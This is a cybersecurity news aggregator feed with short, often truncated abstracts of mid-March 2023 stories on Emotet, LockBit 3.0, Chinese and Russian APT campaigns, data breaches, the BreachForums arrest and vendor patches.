The settlement benefits consumers who received a data breach notification from Orlando Family Physicians informing them their personal information or protected health information may have been compromised in a data breach on April 15, 2021.Cyware
March 20, 2023 – Malware
Emotet Rises Again: Evades Macro Security via OneNote Attachments Full Text
Abstract
The notorious Emotet malware, in its return after a short hiatus , is now being distributed via Microsoft OneNote email attachments in an attempt to bypass macro-based security restrictions and compromise systems. Emotet , linked to a threat actor tracked as Gold Crestwood, Mummy Spider, or TA542, continues to be a potent and resilient threat despite attempts by law enforcement to take it down. A derivative of the Cridex banking worm – which was subsequently replaced by Dridex around the same time GameOver Zeus was disrupted in 2014 – Emotet has evolved into a "monetized platform for other threat actors to run malicious campaigns on a pay-per-install (PPI) model, allowing theft of sensitive data and ransom extortion." While Emotet infections have acted as a conduit to deliver Cobalt Strike, IcedID, Qakbot, Quantum ransomware, and TrickBot, its return in late 2021 was facilitated by means of TrickBot. "Emotet is known for extended periods of inaThe Hacker News
March 20, 2023 – General
IT security spending to reach nearly $300 billion by 2026 Full Text
Abstract
Investments in cybersecurity are expected to reach nearly $300 billion in 2026, driven by the ongoing threat of cyberattacks, the demands of providing a secure hybrid work environment, and the need to meet data privacy and governance requirements.Cyware
March 19, 2023 – General
Security Affairs newsletter Round 411 by Pierluigi Paganini Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Kaspersky...Security Affairs
March 19, 2023 – Breach
Lowe’s Market chain leaves client data up for grabs Full Text
Abstract
A misconfiguration on a website owned by the US-based Lowe’s Market grocery store chain could have allowed threat actors to gain control of its systems. On February 7, the Cybernews research team discovered a misconfiguration on the Lowe's Market...Security Affairs
March 19, 2023 – Breach
NBA is warning fans of a data breach after a third-party newsletter service hack Full Text
Abstract
The NBA (National Basketball Association) disclosed a data breach after a third-party firm providing a newsletter service was breached. The NBA (National Basketball Association) is notifying followers of a data breach after a third-party company providing...Security Affairs
March 18, 2023 – Vulnerabilities
Actively Exploited Microsoft Outlook Vulnerability Imperils Microsoft 365 Apps Full Text
Abstract
Discovered in or around the beginning of March, the Microsoft Outlook vulnerability was found to affect several applications from the Microsoft 365 Apps Enterprise stack, including MS Office 2019, 2016, 2013, and LTSC.Cyware
March 18, 2023 – Hacker
Chinese Hackers Exploit Fortinet Zero-Day Flaw for Cyber Espionage Attack Full Text
Abstract
The zero-day exploitation of a now-patched medium-severity security flaw in the Fortinet FortiOS operating system has been linked to a suspected Chinese hacking group. Threat intelligence firm Mandiant, which made the attribution, said the activity cluster is part of a broader campaign designed to deploy backdoors onto Fortinet and VMware solutions and maintain persistent access to victim environments. The Google-owned threat intelligence and incident response firm is tracking the malicious operation under its uncategorized moniker UNC3886 , a China-nexus threat actor. "UNC3886 is an advanced cyber espionage group with unique capabilities in how they operate on-network as well as the tools they utilize in their campaigns," Mandiant researchers said in a technical analysis. "UNC3886 has been observed targeting firewall and virtualization technologies which lack EDR support. Their ability to manipulate firewall firmware and exploit a zero-day indicates they haveThe Hacker News
March 18, 2023 – Ransomware
QBot Laying the Foundations for Black Basta Ransomware Activity Full Text
Abstract
The attacker’s actions had the whiff of a Black Basta affiliate, with Qbot activity widely reported as being a cornerstone of Black Basta intrusions. Black Basta is a splinter group that emerged after the “Conti” ransomware syndicate was quelled.Cyware
March 18, 2023 – Breach
Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation Full Text
Abstract
Hitachi Energy immediately launched an investigation into the incident and disconnected the compromised system. The company reported the data breach to law enforcement agencies and data protection watchdog.Cyware
March 18, 2023 – Government
US Government Warns Organizations of LockBit 3.0 Ransomware Attacks Full Text
Abstract
Also referred to as LockBit Black, LockBit 3.0 has a more modular architecture compared to its previous variants, and supports various arguments that modify its behavior after deployment.Cyware
March 18, 2023 – Ransomware
Kaspersky released a new decryptor for Conti-based ransomware Full Text
Abstract
Kaspersky released a new version of the decryptor for the Conti ransomware that is based on the previously leaked source code of the malware. Kaspersky has published a new version of a decryption tool for the Conti ransomware based on previously leaked...Security Affairs
March 18, 2023 – Hacker
Chinese Hackers Targeting Security and Network Appliances With Custom Backdoors Full Text
Abstract
Chinese hackers exploited a critical Fortinet bug and used custom networking malware to steal credentials and maintain network access, according to Mandiant. Victims include defense, telecom, and technology firms, as well as government agencies.Cyware
March 18, 2023 – Government
US govt agencies released a joint alert on the Lockbit 3.0 ransomware Full Text
Abstract
The US government released a joint advisory that provides technical details about the operation of the Lockbit 3.0 ransomware gang. The U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State...Security Affairs
March 18, 2023 – Criminals
Feds arrested Pompompurin, the alleged owner of BreachForums Full Text
Abstract
U.S. law enforcement arrested this week a US citizen suspected to be Pompompurin, the notorious owner of the BreachForums cybercrime forum. U.S. law enforcement arrested this week a US man that goes online with the moniker "Pompompurin," the US citizen...Security Affairs
March 18, 2023 – Ransomware
Bee-Ware of Trigona, An Emerging Ransomware Strain Full Text
Abstract
By analyzing Trigona ransomware binaries and ransom notes from VirusTotal, as well as information from incident response, Unit 42 determined that Trigona was very active during December 2022, with at least 15 potential victims being compromised.Cyware
March 18, 2023 – Criminals
Pompompurin Unmasked: Infamous BreachForums Mastermind Arrested in New York Full Text
Abstract
U.S. law enforcement authorities have arrested a New York man in connection with running the infamous BreachForums hacking forum under the online alias "Pompompurin." The development, first reported by Bloomberg Law, comes after News 12 Westchester, earlier this week, said that federal investigators "spent hours inside and outside of a home in Peekskill." "At one point, investigators were seen removing several bags of evidence from the house," the New York-based local news service added. According to an affidavit filed by the Federal Bureau of Investigation (FBI), the suspect identified himself as Conor Brian Fitzpatrick and that he admitted to being the owner of the BreachForums website. "When I arrested the defendant on March 15, 2023, he stated to me in substance and in part that: a) his name was Conor Brian Fitzpatrick; b) he used the alias 'pompompurin,' and c) he was the owner and administrator of 'BreachForums,'The Hacker News
March 18, 2023
LockBit 3.0 Ransomware: Inside the Cyberthreat That’s Costing Millions Full Text
Abstract
U.S. government agencies have released a joint cybersecurity advisory detailing the indicators of compromise (IoCs) and tactics, techniques, and procedures (TTPs) associated with the notorious LockBit 3.0 ransomware . "The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit," the authorities said . The alert comes courtesy of the U.S. Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC). Since emerging in late 2019, the LockBit actors have invested significant technical efforts to develop and fine-tune its malware, issuing two major updates — LockBit 2.0, released in mid-2021, and LockBit 3.0 , released in June 2022. The two versions are also known as LockBit Red and LockBit Black, respectively. "LockBit 3.0 accepts additionThe Hacker News
March 17, 2023 – Breach
Hitachi Energy breached by Clop gang through GoAnywhere Zero-Day exploitation Full Text
Abstract
Hitachi Energy disclosed a data breach, the Clop ransomware gang stole the company data by exploiting the recent GoAnywhere zero-day flaw. Hitachi Energy disclosed a data breach, the company was hacked by the Clop ransomware gang that stole its data...Security Affairs
March 17, 2023 – APT
China-based Tick APT Deploys Custom Malware and Uses Other Tools Full Text
Abstract
ESET researchers found that the Tick cyberespionage group compromised an East Asian Data-Loss Prevention (DLP) company in 2021 and used a wide range of tools in similar attacks. In one of its campaigns, it used a tampered version of a legitimate app called Q-Dir to drop an open-source VBScript back...Cyware
March 17, 2023 – Botnet
HinataBot, a new Go-Based DDoS botnet in the threat landscape Full Text
Abstract
A new Golang-based DDoS botnet, tracked as HinataBot, targets routers and servers by exploiting known vulnerabilities. Akamai researchers spotted a new DDoS Golang-based botnet, dubbed HinataBot, which has been observed exploiting known flaws...Security Affairs
March 17, 2023 – General
Is Russia regrouping for renewed cyberwar? Full Text
Abstract
As of late November 2022, Microsoft and other security firms identified a new form of ransomware, called “Sullivan”, deployed against Ukrainian targets, in addition to the “Prestige” ransomware Russia deployed in Ukraine and Poland in October 2022.Cyware
March 17, 2023 – Phishing
FakeCalls Vishing Malware Targets South Korean Users via Popular Financial Apps Full Text
Abstract
An Android voice phishing (aka vishing) malware campaign known as FakeCalls has reared its head once again to target South Korean users under the guise of over 20 popular financial apps. "FakeCalls malware possesses the functionality of a Swiss army knife, able not only to conduct its primary aim but also to extract private data from the victim's device," cybersecurity firm Check Point said . FakeCalls was previously documented by Kaspersky in April 2022, describing the malware's capabilities to imitate phone conversations with a bank customer support agent. In the observed attacks, users who install the rogue banking app are enticed into calling the financial institution by offering a fake low-interest loan. At the point where the phone call actually happens, a pre-recorded audio with instructions from the real bank is played. Simultaneously, the malware conceals the phone number with the bank's legitimate number to give the impression that a conversationThe Hacker News
March 17, 2023 – Insider Threat
Top 5 Insider Threats to Look Out For in 2023 Full Text
Abstract
Unquestionably, 'insider threats' is one of the most neglected aspects of cybersecurity and some companies fail to recognize associated dangers. Cyberattacks are growing more complex as technology advances. Many businesses concentrate their cybersecurity...Security Affairs
March 17, 2023 – Phishing
SVB account holders targeted with phishing, scams Full Text
Abstract
After news broke late last week about Silicon Valley Bank’s bank run and collapse, security researchers started warning SVB account holders about incoming SVB-related scams and phishing attempts.Cyware
March 17, 2023 – Solution
THN Webinar: 3 Research-Backed Ways to Secure Your Identity Perimeter Full Text
Abstract
Think of the typical portrayal of a cyberattack. Bad guy pounding furiously on a keyboard, his eyes peeking out from under a dark hoodie. At long last, his efforts pay off and he hits the right combination of keys. "I'm in!" he shouts in triumph. Clearly, there are many problems with this scenario – and it's not just the hoodie. What's even more inaccurate is that most cyber attackers today do not rely on unsophisticated methods like brute force. Instead, they target users directly through social engineering, spearphishing and business email compromise (BEC). In light of this, it can be said that cybercriminals no longer break into corporate systems; instead, they log in with valid user credentials. In this landscape of highly targeted cyberattacks, the identity perimeter has emerged as a crucial battlefield. Unfortunately, too many businesses continue to rely on outdated security strategies and tools that leave their users and sensitive systems unprotected. SThe Hacker News
March 17, 2023 – APT
China-linked APT likely linked to Fortinet zero-day attacks Full Text
Abstract
An alleged Chinese threat actor group is behind attacks on government organizations exploiting a Fortinet zero-day flaw (CVE-2022-41328). A suspected China-linked group is exploiting a Fortinet zero-day vulnerability, tracked as CVE-2022-41328, in attacks...Security Affairs
March 17, 2023 – Breach
Data Breach at Tuscaloosa’s NorthStar Paramedic Services Could Impact 82,000 Patients Full Text
Abstract
On Tuesday, NorthStar Emergency Paramedic Services took to its website to report the problem and mailed physical letters to patients who may have been impacted by the breach. The company said they became aware of the potential intrusion in September.Cyware
March 17, 2023 – Vulnerabilities
New GoLang-Based HinataBot Exploiting Router and Server Flaws for DDoS Attacks Full Text
Abstract
A new Golang-based botnet dubbed HinataBot has been observed to leverage known flaws to compromise routers and servers and use them to stage distributed denial-of-service (DDoS) attacks. "The malware binaries appear to have been named by the malware author after a character from the popular anime series, Naruto, with file name structures such as 'Hinata-The Hacker News
March 17, 2023 – Solution
Meta Develops New Kill Chain Thesis Full Text
Abstract
The Meta approach starts from the assumption that despite the asynchronous nature of attacks, there are still meaningful commonalities, especially where those commonalities can be abstracted from the platform or hardware being attacked.Cyware
March 17, 2023 – Education
A New Security Category Addresses Web-borne Threats Full Text
Abstract
In the modern corporate IT environment, which relies on cloud connectivity, global connections and large volumes of data, the browser is now the most important work interface. The browser connects employees to managed resources, devices to the web, and the on-prem environment to the cloud one. Yet, and probably unsurprisingly, this browser prominence has significantly increased the number of threats that adversaries target the browser with. Attackers are now leveraging the browser's core functionality - rendering and executing web pages for users to access - to perform attacks. The browser is now an attack surface, as well as an attack vector for malicious access to corporate SaaS and web applications through account takeover and the use of compromised credentials. To address this issue, a new guide was recently published (Download Here). It analyzes what a solution to these threats would look like. The guide, "Protection from web-borne threats starts with Browser SecuritThe Hacker News
March 17, 2023 – Cryptocurrency
Trojanized WhatsApp and Telegram Apps Go After Victims’ Cryptocurrency Wallets Full Text
Abstract
Threat actors are going after victims’ cryptocurrency funds using trojanized Telegram and WhatsApp applications for Android and Windows. The malware can switch cryptocurrency wallet addresses sent in chat messages with attackers' wallet addresses.Cyware
March 17, 2023 – Phishing
Lookalike Telegram and WhatsApp Websites Distributing Cryptocurrency Stealing Malware Full Text
Abstract
Copycat websites for instant messaging apps like Telegram and WhatsApp are being used to distribute trojanized versions and infect Android and Windows users with cryptocurrency clipper malware. "All of them are after victims' cryptocurrency funds, with several targeting cryptocurrency wallets," ESET researchers Lukáš Štefanko and Peter Strýček said in a new analysis. While the first instance of clipper malware on the Google Play Store dates back to 2019, the development marks the first time Android-based clipper malware has been built into instant messaging apps. "Moreover, some of these apps use optical character recognition (OCR) to recognize text from screenshots stored on the compromised devices, which is another first for Android malware," the Slovak cybersecurity firm added. The attack chain begins with unsuspecting users clicking on fraudulent ads on Google search results that lead to hundreds of sketchy YouTube channels, which then direct themThe Hacker News
March 17, 2023 – APT
Winter Vivern APT Group Targeting Indian, Lithuanian, Slovakian, and Vatican Officials Full Text
Abstract
The advanced persistent threat known as Winter Vivern has been linked to campaigns targeting government officials in India, Lithuania, Slovakia, and the Vatican since 2021. The activity targeted Polish government agencies, the Ukraine Ministry of Foreign Affairs, the Italy Ministry of Foreign Affairs, and individuals within the Indian government, SentinelOne said in a report shared with The Hacker News. "Of particular interest is the APT's targeting of private businesses, including telecommunications organizations that support Ukraine in the ongoing war," senior threat researcher Tom Hegel said. Winter Vivern, also tracked as UAC-0114, drew attention last month after the Computer Emergency Response Team of Ukraine (CERT-UA) detailed a new malware campaign aimed at state authorities of Ukraine and Poland to deliver a piece of malware dubbed Aperetif. Previous public reports chronicling the group show that it has leveraged weaponized Microsoft Excel documents conThe Hacker News
March 17, 2023 – Vulnerabilities
Google Uncovers 18 Severe Security Vulnerabilities in Samsung Exynos Chips Full Text
Abstract
Google is calling attention to a set of severe security flaws in Samsung's Exynos chips, some of which could be exploited remotely to completely compromise a phone without requiring any user interaction. The 18 zero-day vulnerabilities affect a wide range of Android smartphones from Samsung, Vivo, Google, wearables using the Exynos W920 chipset, and vehicles equipped with the Exynos Auto T5123 chipset. Four of the 18 flaws make it possible for a threat actor to achieve internet-to-[…] in late 2022 and early 2023, said. "[The] four vulnerabilities allow an attacker to remotely compromise a phone at the baseband level with no user interaction, and require only that the attacker know the victim's phone number," Tim Willis, head of Google Project Zero, said. In doing so, a threat actor could gain entrenched access to cellular information passing in and out of the targeted deviThe Hacker News
March 16, 2023 – Malware
New dotRunpeX Malware Injector Spotted in the Wild Full Text
Abstract
Check Point Research laid bare tech details of the dotRunpeX injector that delivers a range of known malware families such as AgentTesla, AsyncRat, AveMaria/WarzoneRAT, BitRAT, Formbook, and more. The first-stage loaders are primarily delivered via phishing emails that contain malicious ... Read MoreCyware
March 16, 2023 – Hacker
Chinese and Russian Hackers Using SILKLOADER Malware to Evade Detection Full Text
Abstract
Threat activity clusters affiliated with the Chinese and Russian cybercriminal ecosystems have been observed using a new piece of malware that's designed to load Cobalt Strike onto infected machines. Dubbed SILKLOADER by Finnish cybersecurity company WithSecure, the malware leverages DLL side-loading techniques to deliver commercial adversary simulation software. The development comes as improved detection capabilities against Cobalt Strike, a legitimate post-exploitation tool used for red team operations, are forcing threat actors to seek alternative options or concoct new ways to propagate the framework to evade detection. "The most common of these include adding complexity to the auto-generated beacon or stager payloads via the utilization of packers, crypters, loaders, or similar techniques," WithSecure researchers said. SILKLOADER joins other loaders such as KoboldLoader, MagnetLoader, and LithiumLoader that have been recently discovered incorporatingThe Hacker News
March 16, 2023 – Vulnerabilities
Baseband RCE flaws in Samsung’s Exynos chipsets expose devices to remote hack Full Text
Abstract
Google's Project Zero hackers found multiple flaws in Samsung's Exynos chipsets that expose devices to remote hack with no user interaction. White hat hackers at Google's Project Zero unit discovered multiple vulnerabilities in Samsung's Exynos...Security Affairs
March 16, 2023 – Hacker
Hackers Use AI-Generated YouTube Videos to Spread Info-stealers Full Text
Abstract
CloudSEK witnessed a 200-300% month-on-month surge in AI-generated YouTube videos about software cracks containing malicious links to a variety of stealer malware such as Raccoon, RedLine, and Vidar. To make the videos appear at the top of the results, threat actors employ SEO poisoning techniques. ... Read MoreCyware
March 16, 2023 – Cryptocurrency
Cryptojacking Group TeamTNT Suspected of Using Decoy Miner to Conceal Data Exfiltration Full Text
Abstract
The cryptojacking group known as TeamTNT is suspected to be behind a previously undiscovered strain of malware used to mine Monero cryptocurrency on compromised systems. That's according to Cado Security, which found the sample after Sysdig detailed a sophisticated attack known as SCARLETEEL aimed at containerized environments to ultimately steal proprietary data and software. Specifically, the early phase of the attack chain involved the use of a cryptocurrency miner, which the cloud security firm suspected was deployed as a decoy to conceal the detection of data exfiltration. The artifact – uploaded to VirusTotal late last month – "bear[s] several syntactic and semantic similarities to prior TeamTNT payloads, and includes a wallet ID that has previously been attributed to them," a new analysis from Cado Security has revealed. TeamTNT, active since at least 2019, has been documented to repeatedly strike cloud and container environments to deploy cryptocurThe Hacker News
March 16, 2023 – Government
Microsoft sheds light on a year of Russian hybrid warfare in Ukraine Full Text
Abstract
Russia-linked threat actors targeted at least 17 European nations in 2023, and 74 countries since the start of the invasion of Ukraine. Microsoft revealed that Russia-linked threat actors targeted at least 17 European nations between January and mid-February...Security Affairs
March 16, 2023 – Criminals
Makop Ransomware Gang: A Detailed Look Full Text
Abstract
Cybersecurity researcher Luca Mella shared technical insights on the Makop ransomware that attains persistence through dedicated .NET tools. To access victim networks, the gang makes use of internet-facing bugs and exposed remote administrative services. The operators began to work for their crimin ... Read MoreCyware
March 16, 2023 – Criminals
Authorities Shut Down ChipMixer Platform Tied to Crypto Laundering Scheme Full Text
Abstract
A coalition of law enforcement agencies across Europe and the U.S. announced the takedown of ChipMixer, an unlicensed cryptocurrency mixer that began its operations in August 2017. "The ChipMixer software blocked the blockchain trail of the funds, making it attractive for cybercriminals looking to launder illegal proceeds from criminal activities such as drug trafficking, weapons trafficking, ransomware attacks, and payment card fraud," Europol said in a statement. The coordinated exercise, besides dismantling the clearnet and dark web websites associated with ChipMixer, also resulted in the seizure of $47.5 million in Bitcoin and 7 TB of data. Mixers, also called tumblers, offer full anonymity for a fee by commingling cryptocurrency from different users – both legitimate and criminally-derived funds – in a manner that makes it hard to trace the origins. This is achieved by funneling different payments into a single pool before splitting up each amount and transmitThe Hacker News
March 16, 2023 – Government
Polish intelligence dismantled a network of Russian spies Full Text
Abstract
Polish intelligence dismantled a cell of Russian spies that gathered info on military equipment deliveries to Ukraine via the EU member. Polish counter-intelligence has dismantled a cell of Russian spies that gathered information on the provisioning...Security Affairs
March 16, 2023 – Vulnerabilities
Mozilla Patches High-Severity Vulnerabilities With Release of Firefox 111 Full Text
Abstract
Mozilla announced this week the release of Firefox 111, which patches over a dozen vulnerabilities, including potentially serious issues. Of the 13 CVEs, seven have been assigned a ‘high’ severity rating.Cyware
March 16, 2023 – General
What’s Wrong with Manufacturing? Full Text
Abstract
In last year's edition of the Security Navigator we noted that the Manufacturing Industry appeared to be totally over-represented in our dataset of Cyber Extortion victims. Neither the number of businesses nor their average revenue particularly stood out to explain this. Manufacturing was also the most represented Industry in our CyberSOC dataset – contributing more Incidents than any other sector. We found this trend confirmed in 2023 – so much so, in fact, that we decided to take a closer look. So let's examine some possible explanations. And debunk them. Hunting for possible explanations: Manufacturing is still the most impacted industry in our Cyber Extortion dataset in 2023, as tracked by monitoring double-extortion leak sites. Indeed, this sector now represents more than 20% of all victims since we started observing the leak sites in the beginning of 2020. Approximately 28% of all our clients are from Manufacturing, contributing with an overall share of 31% of all pThe Hacker News
March 16, 2023 – Attack
Multiple threat actors exploited Progress Telerik bug to breach U.S. federal agency Full Text
Abstract
Multiple threat actors exploited a critical flaw in Progress Telerik to breach an unnamed US federal agency, said the US government. A joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation...Security Affairs
March 16, 2023 – General
Cyber attribution: Vigilance or distraction? Full Text
Abstract
The importance of attribution depends on the organization involved and whether it can see an investigation through. With investigations taking lots of time and resources, it shouldn’t be an organization’s priority in the event of a breach.Cyware
March 16, 2023 – Attack
Multiple Hacker Groups Exploit 3-Year-Old Vulnerability to Breach U.S. Federal Agency Full Text
Abstract
Multiple threat actors, including a nation-state group, exploited a critical three-year-old security flaw in Progress Telerik to break into an unnamed federal entity in the U.S. The disclosure comes from a joint advisory issued by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and Multi-State Information Sharing and Analysis Center (MS-ISAC). "Exploitation of this vulnerability allowed malicious actors to successfully execute remote code on a federal civilian executive branch (FCEB) agency's Microsoft Internet Information Services (IIS) web server," the agencies said. The indicators of compromise (IoCs) associated with the digital break-in were identified from November 2022 through early January 2023. Tracked as CVE-2019-18935 (CVSS score: 9.8), the issue relates to a .NET deserialization vulnerability affecting Progress Telerik UI for ASP.NET AJAX that, if left unpatched, could lead to remote code execThe Hacker News
March 16, 2023 – Government
CISA adds Adobe ColdFusion bug to Known Exploited Vulnerabilities Catalog Full Text
Abstract
US CISA added an actively exploited vulnerability in Adobe ColdFusion to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a critical vulnerability in Adobe ColdFusion, tracked as CVE-2023-26360 (CVSS...Security Affairs
March 16, 2023 – Policy and Law
Two Hackers Charged With Accessing Federal Law Enforcement Database Full Text
Abstract
The two hackers, belonging to the "ViLE" crime group, allegedly broke into a federal law enforcement database. They also used a compromised Bangladeshi police officer's email to fraudulently request user data from a social media company.Cyware
March 16, 2023 – Government
CISA Issues Urgent Warning: Adobe ColdFusion Vulnerability Exploited in the Wild Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on March 15 added a security vulnerability impacting Adobe ColdFusion to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The critical flaw in question is CVE-2023-26360 (CVSS score: 8.6), which could be exploited by a threat actor to achieve arbitrary code execution. "Adobe ColdFusion contains an improper access control vulnerability that allows for remote code execution," CISA said. The vulnerability impacts ColdFusion 2018 (Update 15 and earlier versions) and ColdFusion 2021 (Update 5 and earlier versions). It has been addressed in versions Update 16 and Update 6, respectively, released on March 14, 2023. It's worth noting that CVE-2023-26360 also affects ColdFusion 2016 and ColdFusion 11 installations, both of which are no longer supported by the software company as they have reached end-of-life (EoL). While the exact details surrounding the natuThe Hacker News
March 16, 2023 – Government
CISA says federal civilian agency hacked by nation-state and criminal hacking groups Full Text
Abstract
According to the alert, both the unnamed nation-backed hacking group and the criminal group dubbed XE Group exploited known vulnerabilities in Progress Telerik software located in the unnamed government agency’s Microsoft IIS web server.Cyware
March 16, 2023 – General
Google Proposes Reducing TLS Cert Life Span to 90 Days Full Text
Abstract
By virtue of Chrome's market share, if Google makes this change for Chrome, that makes it a de facto standard that every commercial public certificate authority would have to follow.Cyware
March 15, 2023 – Breach
Key Aerospace Player Safran Group Leaks Sensitive Data Full Text
Abstract
The Cybernews research team recently discovered that the French-based multinational aviation company, the eighth largest aerospace supplier worldwide, was leaking sensitive data due to a misconfiguration of its systems.Cyware
March 15, 2023 – Hacker
YoroTrooper Stealing Credentials and Information from Government and Energy Organizations Full Text
Abstract
A previously undocumented threat actor dubbed YoroTrooper has been targeting government, energy, and international organizations across Europe as part of a cyber espionage campaign that has been active since at least June 2022. "Information stolen from successful compromises include credentials from multiple applications, browser histories and cookies, system information and screenshots," Cisco Talos researchers Asheer Malhotra and Vitor Ventura said in a Tuesday analysis. Prominent countries targeted include Azerbaijan, Tajikistan, Kyrgyzstan, Turkmenistan, and other Commonwealth of Independent States (CIS) nations. The threat actor is believed to be Russian-speaking owing to the victimology patterns and the presence of Cyrillic snippets in some of the implants. That said, the YoroTrooper intrusion set has been found to exhibit tactical overlaps with the PoetRAT team that was documented in 2020 as leveraging coronavirus-themed baits to strike government and eneThe Hacker News
March 15, 2023 – APT
Russia-linked APT29 abuses EU information exchange systems in recent attacks Full Text
Abstract
Russia-linked APT29 group abused the legitimate information exchange systems used by European countries to target government entities. Russia-linked APT29 (aka SVR group, Cozy Bear, Nobelium, and The Dukes) was spotted abusing the legitimate information...Security Affairs
March 15, 2023 – Criminals
Criminals already targeting nervous SVB customers Full Text
Abstract
According to various researchers and security firms, threat actors are already out hunting for SVB-exposed prey through both passive and active phishing scams, including similar fake domains and business email compromise (BEC) attacks.Cyware
March 15, 2023 – Cryptocurrency
New Cryptojacking Operation Targeting Kubernetes Clusters for Dero Mining Full Text
Abstract
Cybersecurity researchers have discovered the first-ever illicit cryptocurrency mining campaign used to mint Dero since the start of February 2023. "The novel Dero cryptojacking operation concentrates on locating Kubernetes clusters with anonymous access enabled on a Kubernetes API and listening on non-standard ports accessible from the internet," CrowdStrike said in a new report shared with The Hacker News. The development marks a notable shift from Monero, which is a prevalent cryptocurrency used in such campaigns. It's suspected it may have to do with the fact that Dero "offers larger rewards and provides the same or better anonymizing features." The attacks, attributed to an unknown financially motivated actor, commence with scanning for Kubernetes clusters with authentication set as --anonymous-auth=true, which allows anonymous requests to the server, to drop initial payloads from three different U.S.-based IP addresses. This includes deployingThe Hacker News
March 15, 2023 – APT
YoroTrooper APT group targets CIS countries and embassies Full Text
Abstract
A new APT group, dubbed YoroTrooper, has been targeting government and energy organizations across Europe, experts warn. Cisco Talos researchers uncovered a new cyber espionage group targeting CIS countries, embassies, and an EU health care agency since...Security Affairs
March 15, 2023 – Policy and Law
ISO27001 Updates: Change is afoot Full Text
Abstract
The standard hasn't had a significant update since 2013. There were some minor amendments in 2017, but largely these were structural or grammatical updates. In 2022, things have changed dramatically, but also in very subtle ways.Cyware
March 15, 2023 – Education
The Different Methods and Stages of Penetration Testing Full Text
Abstract
The stakes could not be higher for cyber defenders. With the vast amounts of sensitive information, intellectual property, and financial data at risk, the consequences of a data breach can be devastating. According to a report released by the Ponemon Institute, the cost of data breaches has reached an all-time high, averaging $4.35 million in 2022. Vulnerabilities in web applications are often the primary gateway for attackers. According to a World Economic Forum report, just one week after discovering a critical security flaw in a widely used software library (Log4j), more than 100 attempts at exploiting the vulnerability were detected every minute. This illustrates how quickly malicious actors can take advantage of vulnerabilities, highlighting the urgency of regularly assessing and monitoring your system for any vulnerabilities or weak points. The complexity of addressing security challenges in today's digital world is further compounded by the rising use of open-source compoThe Hacker News
March 15, 2023 – Cryptocurrency
CrowdStrike discovered the first-ever Dero cryptocurrency mining campaign Full Text
Abstract
CrowdStrike researchers discovered the first-ever cryptocurrency mining campaign aimed at Dero mining since February 2023. CrowdStrike has discovered the first-ever Dero cryptojacking campaign aimed at Kubernetes infrastructure. Dero is a general-purpose,...Security Affairs
March 15, 2023 – Attack
Ring Denies Falling Victim to Ransomware Attack Full Text
Abstract
On Monday, the cybergang behind the Alphv ransomware added an entry to their leaks site claiming they breached Ring and threatening to release data supposedly stolen from the company.Cyware
March 15, 2023 – APT
Tick APT Targeted High-Value Customers of East Asian Data-Loss Prevention Company Full Text
Abstract
A cyberespionage actor known as Tick has been attributed with high confidence to a compromise of an East Asian data-loss prevention (DLP) company that caters to government and military entities. "The attackers compromised the DLP company's internal update servers to deliver malware inside the software developer's network, and trojanized installers of legitimate tools used by the company, which eventually resulted in the execution of malware on the computers of the company's customers," ESET researcher Facundo Muñoz said. Tick, also known as Bronze Butler, REDBALDKNIGHT, Stalker Panda, and Stalker Taurus, is a suspected China-aligned collective that has primarily gone after government, manufacturing, and biotechnology firms in Japan. It's said to be active since at least 2006. Other lesser-known targets include Russian, Singaporean, and Chinese enterprises. Attack chains orchestrated by the group have typically leveraged spear-phishing emails and strThe Hacker News
March 15, 2023 – Breach
Security Firm Rubrik breached by Clop gang through GoAnywhere Zero-Day exploitation Full Text
Abstract
Data security firm Rubrik discloses a data breach; attackers exploited a recent GoAnywhere zero-day to steal its data. Cybersecurity firm Rubrik disclosed a data breach, a ransomware group stole company data by exploiting the recently disclosed zero-day...Security Affairs
March 15, 2023 – Government
Rishi Sunak hints at TikTok ban from UK government devices Full Text
Abstract
Rishi Sunak has indicated that the UK could follow the US and Canada in banning TikTok from government devices, saying he will take “whatever steps are necessary” to protect Britain’s security.Cyware
March 15, 2023 – Vulnerabilities
Microsoft Rolls Out Patches for 80 New Security Flaws — Two Under Active Attack Full Text
Abstract
Microsoft's Patch Tuesday update for March 2023 is rolling out with remediations for a set of 80 security flaws, two of which have come under active exploitation in the wild. Eight of the 80 bugs are rated Critical, 71 are rated Important, and one is rated Moderate in severity. The updates are in addition to 29 flaws the tech giant fixed in its Chromium-based Edge browser in recent weeks. The two vulnerabilities that have come under active attack include a Microsoft Outlook privilege escalation flaw (CVE-2023-23397, CVSS score: 9.8) and a Windows SmartScreen security feature bypass (CVE-2023-24880, CVSS score: 5.1). CVE-2023-23397 is "triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server," Microsoft said in a standalone advisory. A threat actor could leverage this flaw by sending a specially crafted email, activating it automatically when it is retrieved and prThe Hacker News
March 15, 2023 – Breach
Key aerospace player Safran Group leaks sensitive data Full Text
Abstract
Top aviation company Safran Group left itself vulnerable to cyberattacks, likely for well over a year, underlining how vulnerable big aviation firms are to threat actors, according to research by Cybernews. Original post at https://cybernews.com/security/key-aerospace-player-leaks-sensitive-data/ The...Security Affairs
March 15, 2023 – Attack
YoroTrooper Espionage Campaigns Targeting CIS Countries, Embassies, and EU Healthcare Agency Full Text
Abstract
YoroTrooper’s main tools include Python-based, custom-built, and open-source information stealers, such as the Stink stealer wrapped into executables via the Nuitka framework and PyInstaller.Cyware
March 15, 2023 – Solution
Kali Linux 2023.1 released – and so is Kali Purple! Full Text
Abstract
OffSec (formerly Offensive Security) released Kali Linux 2023.1, the latest version of its popular penetration testing and digital forensics platform, accompanied by a technical preview of Kali Purple, a “one-stop shop for blue and purple teams.”Cyware
March 14, 2023 – Phishing
